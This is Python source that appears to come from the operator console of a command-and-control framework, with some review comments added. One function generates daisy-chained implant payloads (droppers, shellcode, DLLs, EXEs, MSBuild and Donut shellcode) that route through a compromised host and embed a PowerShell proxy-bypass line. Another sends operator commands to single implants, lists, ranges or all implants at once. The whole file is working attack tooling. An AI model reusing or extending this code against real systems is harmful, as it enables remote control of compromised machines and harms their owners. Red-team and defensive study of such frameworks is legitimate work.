def do_createdaisypayload(user, command):
    """Interactively build a set of "daisy" payloads that route through another implant.

    Prompts the operator for a payload name, the daisy URL and the id of the
    implant to chain through, then creates a Payloads object from the C2
    server settings and writes every payload format it supports.

    Args:
        user: operator name; not read by this function.
        command: raw command text; not read by this function.

    Returns:
        None. Side effects: writes payload files under PayloadsDirectory,
        stores a new URL record via new_urldetails, prints status and clears
        the screen.
    """
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    # Loopback literals are rewritten to "localhost" before the URL is embedded
    # in the payload.
    if ("http://127.0.0.1" in daisyurl):
        daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
    if ("https://127.0.0.1" in daisyurl):
        daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    # NOTE(review): no check that a matching implant exists; daisyhost.User /
    # daisyhost.Domain below would raise AttributeError if this returns None.
    daisyhost = get_implantbyid(daisyhostid)
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    pbindsecret = PBindSecret
    pbindpipename = PBindPipeName
    # string_to_array is defined elsewhere; daisyurl_count is not read here.
    daisyurl, daisyurl_count = string_to_array(daisyurl)
    # NOTE(review): daisyhostheader is built (one quoted empty string per
    # comma-separated URL) but never used in this function.
    daisyhostheader = ""
    c = 0
    daisyurls = daisyurl.split(",")
    for url in daisyurls:
        if c > 0:
            daisyhostheader += ",\"\""
        else:
            daisyhostheader += "\"\""
        c += 1
    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)
    # Substitute the daisy host's user@domain for the URL marker in the
    # PowerShell dropper template. Presumably daisyurl is a string after
    # string_to_array; a non-matching marker leaves PSDropper unchanged - verify.
    newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
    # Every output format is written with the "<name>_" prefix.
    newPayload.CreateDroppers("%s_" % name)
    newPayload.CreateShellcode("%s_" % name)
    newPayload.CreateRaw("%s_" % name)
    newPayload.CreateDlls("%s_" % name)
    newPayload.CreateEXE("%s_" % name)
    newPayload.CreateMsbuild("%s_" % name)
    newPayload.CreateDonutShellcode("%s_" % name)
    newPayload.BuildDynamicPayloads("%s_" % name)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()
def get_implant_type_prompt_prefix(implant_id):
    """Return the short implant-type tag shown in the interactive prompt.

    The tag is derived from the implant's Pivot string: a leading "PS", "C#"
    or "Python" is abbreviated to "PS", "C#" or "PY" (any other value is kept
    verbatim), then ";D", ";P" and ";PB" are appended when the Pivot mentions
    "Daisy", "Proxy" or "PBind" respectively. A comma-separated id list has no
    single type and yields "".
    """
    if "," in str(implant_id):
        return ""
    pivot_original = get_implantbyid(implant_id).Pivot

    # First matching prefix wins; no match keeps the full Pivot text.
    prefix = pivot_original
    for marker, short_name in (("PS", "PS"), ("C#", "C#"), ("Python", "PY")):
        if pivot_original.startswith(marker):
            prefix = short_name
            break

    # Feature flags are appended in a fixed order regardless of Pivot layout.
    flags = [
        tag
        for needle, tag in (("Daisy", ";D"), ("Proxy", ";P"), ("PBind", ";PB"))
        if needle in pivot_original
    ]
    return prefix + "".join(flags)
def implant_command_loop(implant_id: str, user: str) -> None:
    """Read operator commands for one or more implants and dispatch them.

    Keeps prompting until the operator enters "back" or "clear" (handled by
    do_back), an EOF is read (logs the user off and exits the process), or an
    unexpected exception escapes (traceback is printed and the loop exits).
    Ctrl-C only restarts the prompt.

    Args:
        implant_id: selector typed by the operator - "all", a comma-separated
            list of ids, a range "a-b", or a single id.
        user: operator name, passed through to run_implant_command and logging.

    Returns:
        None.

    A multi-line command is either split on "\\n" and sent line by line, or
    sent as one block, depending on the operator's answer to the "(Y/n)"
    prompt. Command text is forwarded to run_implant_command unmodified.
    """
    while (True):
        try:
            style = Style.from_dict({
                '': '#80d130',
            })
            session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
            implant_id_orig = implant_id
            # Multi-implant selectors get the generic completer; a single id
            # gets a completer and colour matched to that implant's Pivot.
            if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id):
                print(Colours.GREEN)
                prompt_commands = POSH_COMMANDS
                command = session.prompt("%s> " % implant_id, completer=FirstWordFuzzyWordCompleter(prompt_commands, WORD=True))
                if command == "back" or command == 'clear':
                    do_back(user, command)
                    return
            else:
                implant = get_implantbyid(implant_id)
                if not implant:
                    print_bad("Unrecognised implant id or command: %s" % implant_id)
                    input("Press Enter to continue...")
                    clear()
                    return
                prompt_commands = POSH_COMMANDS
                if implant.Pivot.startswith('Python'):
                    prompt_commands = PY_COMMANDS
                if implant.Pivot.startswith('C#'):
                    prompt_commands = SHARP_COMMANDS
                if 'PB' in implant.Pivot:
                    # PBind implants use a blue prompt and the C# command set.
                    style = Style.from_dict({
                        '': '#008ECC',
                    })
                    session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
                    prompt_commands = SHARP_COMMANDS
                    print(Colours.BLUE)
                else:
                    print(Colours.GREEN)
                print("%s\\%s @ %s (PID:%s)" % (implant.Domain, implant.User, implant.Hostname, implant.PID))
                command = session.prompt("%s %s> " % (get_implant_type_prompt_prefix(implant_id), implant_id), completer=FirstWordFuzzyWordCompleter(prompt_commands, WORD=True))
                if command == "back" or command == 'clear':
                    do_back(user, command)
                    return

            # `ri` is only bound when the command contains a newline; every
            # branch below reads it under that same condition.

            # if "all" run through all implants get_implants()
            if implant_id == "all":
                # This check is already satisfied above for "all"; kept as-is.
                if command == "back" or command == 'clear':
                    do_back(user, command)
                    return
                allcommands = command
                if "\n" in command:
                    ri = input("Do you want to run commands separately? (Y/n) ")
                implants_split = get_implants()
                if implants_split:
                    for implant_details in implants_split:
                        # if "\n" in command run each command individually or ask the question if that's what they want to do
                        if "\n" in allcommands:
                            if ri.lower() == "y" or ri == "":
                                commands = allcommands.split('\n')
                                for command in commands:
                                    run_implant_command(command, implant_details.RandomURI, implant_id_orig, user)
                            else:
                                run_implant_command(command, implant_details.RandomURI, implant_id_orig, user)
                        else:
                            run_implant_command(command, implant_details.RandomURI, implant_id_orig, user)
            # if "separated list" against single uri
            elif "," in implant_id:
                allcommands = command
                if "\n" in command:
                    ri = input("Do you want to run commands separately? (Y/n) ")
                implant_split = implant_id.split(",")
                for split_implant_id in implant_split:
                    implant_randomuri = get_randomuri(split_implant_id)
                    # if "\n" in command run each command individually or ask the question if that's what they want to do
                    if "\n" in allcommands:
                        if ri.lower() == "y" or ri == "":
                            commands = allcommands.split('\n')
                            for command in commands:
                                run_implant_command(command, implant_randomuri, implant_id_orig, user)
                        else:
                            run_implant_command(command, implant_randomuri, implant_id_orig, user)
                    else:
                        run_implant_command(command, implant_randomuri, implant_id_orig, user)
            # if "range" against single uri
            elif "-" in implant_id:
                allcommands = command
                if "\n" in command:
                    ri = input("Do you want to run commands separately? (Y/n) ")
                implant_split = implant_id.split("-")
                # Inclusive range; int() on a malformed bound raises ValueError,
                # which is caught by the outer handler and ends the loop.
                for range_implant_id in range(int(implant_split[0]), int(implant_split[1]) + 1):
                    try:
                        implant_randomuri = get_randomuri(range_implant_id)
                        # if "\n" in command run each command individually or ask the question if that's what they want to do
                        if "\n" in allcommands:
                            if ri.lower() == "y" or ri == "":
                                commands = allcommands.split('\n')
                                for command in commands:
                                    run_implant_command(command, implant_randomuri, implant_id_orig, user)
                            else:
                                run_implant_command(command, implant_randomuri, implant_id_orig, user)
                        else:
                            run_implant_command(command, implant_randomuri, implant_id_orig, user)
                    except Exception:
                        # NOTE(review): any failure inside the loop body, not
                        # only an unknown id, is reported with this message.
                        print_bad("Unknown ImplantID")
            # else run against single uri
            else:
                allcommands = command
                if "\n" in command:
                    ri = input("Do you want to run commands separately? (Y/n) ")
                implant_randomuri = get_randomuri(implant_id)
                # if "\n" in command run each command individually or ask the question if that's what they want to do
                if "\n" in allcommands:
                    if ri.lower() == "y" or ri == "":
                        commands = allcommands.split('\n')
                        for command in commands:
                            run_implant_command(command, implant_randomuri, implant_id_orig, user)
                    else:
                        run_implant_command(command, implant_randomuri, implant_id_orig, user)
                else:
                    run_implant_command(command, implant_randomuri, implant_id_orig, user)
        except KeyboardInterrupt:
            # Ctrl-C discards the current prompt and re-prompts.
            continue
        except EOFError:
            new_c2_message("%s logged off." % user)
            sys.exit(0)
        except Exception as e:
            # Catch-all boundary: report and leave the loop rather than spin.
            traceback.print_exc()
            print_bad(f"Error running against the selected implant ID, ensure you have typed the correct information: {e}")
            return